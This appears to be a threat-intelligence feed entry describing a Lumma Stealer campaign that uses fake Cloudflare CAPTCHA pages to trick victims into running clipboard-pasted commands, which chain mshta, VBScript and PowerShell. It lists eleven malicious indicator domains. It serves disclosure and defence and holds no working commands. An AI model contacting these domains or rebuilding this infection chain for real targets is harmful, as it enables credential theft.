Fake CAPTCHA Lures Victims: Lumma Stealer Abuses Clipboard and PowerShell

Feb. 26, 2025, 8:54 a.m.

Description

A new malware campaign using fake CAPTCHA pages to deliver Lumma Stealer has been identified. The attack leverages ClickFix, a deceptive tactic involving phishing and fake reCAPTCHA pages impersonating Cloudflare verification. The infection chain begins with a fake CAPTCHA page tricking victims into running malicious commands copied to their clipboard. This launches mshta.exe, which executes a VBScript to run PowerShell commands. These commands download and execute a malicious payload, which acts as a loader for Lumma Stealer. The attack uses various evasion techniques, including anti-debugging measures and code injection. The stealer captures screen data, extracts clipboard information, and exfiltrates stolen data through multiple command-and-control servers.

Date

  • Created: Feb. 25, 2025, 7:40 p.m.
  • Published: Feb. 25, 2025, 7:40 p.m.
  • Modified: Feb. 26, 2025, 8:54 a.m.

Indicators

  • voicesharped.com
  • torpdidebar.com
  • rebeldettern.com
  • kvndbb3.com
  • importenptoc.com
  • hopeefreamed.com
  • garulouscuto.com
  • deskbot.net
  • breedertremnd.com
  • ignoredshee.com
  • actiothreaz.com

Attack Patterns

  • Lumma Stealer